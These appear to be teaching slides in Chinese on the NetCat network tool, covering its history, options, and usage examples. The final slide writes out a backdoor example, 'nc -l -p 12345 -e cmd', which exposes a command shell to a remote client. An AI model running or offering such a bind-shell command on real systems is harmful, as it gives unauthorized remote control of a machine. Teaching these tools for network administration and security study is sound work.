探測工具:NetCat
NetCat 簡介 NetCat是TCP/UDP協定工具,最初的版本是1995 年由Hobbit所撰寫,主要在Unix平台執行 1997年,由Weld Pond改寫成Windows版本。 其發展的原始用途是用來管理系統和偵查網路的錯 誤,但在有心人士的利用下,成了駭客入侵伺服器 的利器
NetCat 原理 cat指令:cat是unix上的標準工具。其可以讀入 一個文件的內容,然後輸出到螢幕或另一個檔案 上。 NetCat:cat指令的網路版,其可以從網路的一 端接收封包,然後將封包傳送到網路的另一端, 它可以支援tcp和udp協定。 可組合性:netcat 可以和其他應用程式相結合, 進而變成遠端控制程式 (後門程式的始祖)
Netcat 的用法 下載:http://jesterpm.net/downloads.php 語法:nc [-options] hostname port[s] [ports] ... 部份參數說明: -h 使用說明 -l 監聽模式 -n 指定數字的IP位址,不能用hostname -p port 本地port -u UDP模式 -v 詳細輸出,用兩個-v可得到更詳細的內容。-v參數 多出現幾次,則顯示的訊息會更多一些
NetCat使用範例 探測網路主機 簡易聊天室 nc 192.168.1.1 80 (探測對方網站的系統資訊) 主機端(ip:192.168.1.1):nc –l –p 12345 客戶端:nc 192.168.1.1 12345 建立連線後,此主機與客戶即可進行網路聊天
NetCat使用範例 (cont.) 傳送檔案 遠端遙控 (後門程式) 主機端(ip:192.168.1.1):nc –l –p 12345 > test.doc 客戶端:nc 192.168.1.1 12345 < test.doc 客戶可將test.doc 傳送到主機 遠端遙控 (後門程式) 主機端(ip:192.168.1.1):nc –l –p 12345 –e cmd 客戶端:nc 192.168.1.1 12345 客戶可使用主機shell來操作電腦